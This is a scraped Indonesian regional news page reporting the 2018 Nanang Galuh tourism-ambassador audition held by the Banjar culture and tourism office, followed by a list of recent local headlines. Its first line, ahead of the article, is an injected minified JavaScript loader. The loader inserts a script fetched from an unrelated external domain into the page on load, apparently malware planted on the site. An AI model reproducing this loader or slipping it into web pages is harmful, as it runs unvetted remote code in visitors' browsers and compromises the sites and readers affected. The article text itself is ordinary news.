(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Advertorial

Disbudpar Banjar Gelar Audisi Nanang Galuh 2018


MARTAPURA, Dinas Kebudayaan dan Pariwisata (Disbudpar) Kabupaten Banjar menggelaer audisi Nanang-Galuh Kabupaten Banjar 2018, Rabu (18/4). Acara tersebut dibuka lSekteraris Disbudpar Banjar Aidy Hikmatullah SSTP MAP.

Audisi Nanang-Galuh 2018 ikuti oleh 81 peserta, 37 laki-laki dan 44 perempuan. Tidak hanya dari kalangan mahasiswa Nanang-Galuh 2018 juga diikuti kalangan pelajar bangku sekolah menengah di Kabupaten Banjar.

Sekretaris Disbudpar Aidy Hikmatullah mengatakan, tujuan diadakan kegiatan ini  untuk mendapat Nanang Galuh Kabupaten Banjar yang luhur, memiliki wawasan yang luas dalam bidang kebudayaan dan pariwisata. Mendukung dan meningkatkan kepariwisataan daerah yang berdasarkan pada visi Kabupaten Banjar Terwujudnya Masyarakat Kabupaten Banjar yang Sejahtera dan Barokah.

“Audisi Nanang Galuh ini digelar setiap tahunnya untuk menumbuh kembangkan kreatifitas serta kemampuan para generasi muda Kabupaten Banjar,” katanya.

Bernuansa Islami dan Barokah para Nanang Galuh diharapkan bisa menjadi duta wisata yang membawa nama harum Kabupaten Banjar sampai ke tingkat nasional.


Untuk diketahui, audisi Nanang Galuh Kabupaten Banjar 2018 yang berlangsung 18-19 April melalui beberapa tahapan meliputi tes tertulis dan wawancara. Tes wawancara ini terdiri dari 6 bidang meliputi bidang keagamaan, pariwisata, kepribadian, pemerintahan, kebudayaan dan bahasa asing. Untuk wawancara para peserta langsung bertatap muka dengan dewan juri yang berkompeten dengan bidang masing-masing, mereka diberi waktu 5 menit untuk menjawab pertanyaan dari masing-masing juri.

Sedangkan pada 19 April peserta audisi Nanang Galuh test kemampuan bakat satu persatu peserta diberi waktu setiap orang 3 menit untuk memperkenalkan diri dan menampilkan kemampuan bakat yang mereka miliki.

Setelah melewati beberapa tahapan seleksi maka diumumkan para finalis Nanang-Galuh Banjar 2018, dan finalis 8 pasang Nanang Galuh Kabupaten Banjar 2018 berhak mengikuti proses karantina dan menjadi finalis dalam Grand Final Pemilihan Nanang Galuh Kabupaten Banjar 2018 pada 30 Juni 2018 bertempat di Guest House Wisma Sultan Sulaiman Martapura. (hendera)

Reporter : Hendera
Editor : Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Wabup Kapuas Kunjungi Kecamatan Kapuas Hulu dan Mandau Talawang

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Bupati Kapuas Dodo bersama jajaran menempuh jalur sungai dan darat… Read More

5 jam ago

Unjuk Rasa di HSU, GOSTI: Berikan Jabatan ke Orang yang Bertanggung Jawab

‎KANALKALIMANTAN.COM, AMUNTAI - Pemerintah Kabupaten (Pemkab) Hulu Sungai Utara (HSU) mendapatkan dukungan menjalankan pemerintahan bersih… Read More

6 jam ago

Pesan Edukatif Street Art Dakwah South Borneo Lewat Mural dan Grafiti

KANALKALIMANTAN.COM, BANJARMASIN - Street Art Dakwah South Borneo memanfaatkan seni mural dan grafiti sebagai alat… Read More

7 jam ago

Unjuk Rasa di Halaman DPRD HSU

KANALKALIMANTAN.COM, AMUNTAI – Massa yang tergabung dalam Lembaga Swadaya Masyarakat (LSM) Gerakan Organisasi Sosial Terintegritas… Read More

7 jam ago

Wabup Balangan Serahkan Beasiswa Program KBP ke 1.511 Pelajar

KANALKALIMANTAN.COM, PARINGIN - Wakil Bupati (Wabup) Balangan, Akhmad Fauzi, menyerahkan beasiswa program Kartu Balangan Pintar… Read More

8 jam ago

DKISP Banjar Gelar Penandatanganan Pakta Integritas

KANALKALIMANTAN.COM, MARTAPURA – Kepala Dinas Komunikasi, Informatika, Statistik, dan Persandian (DKISP) Kabupaten Banjar HM Aidil… Read More

8 jam ago

This website uses cookies.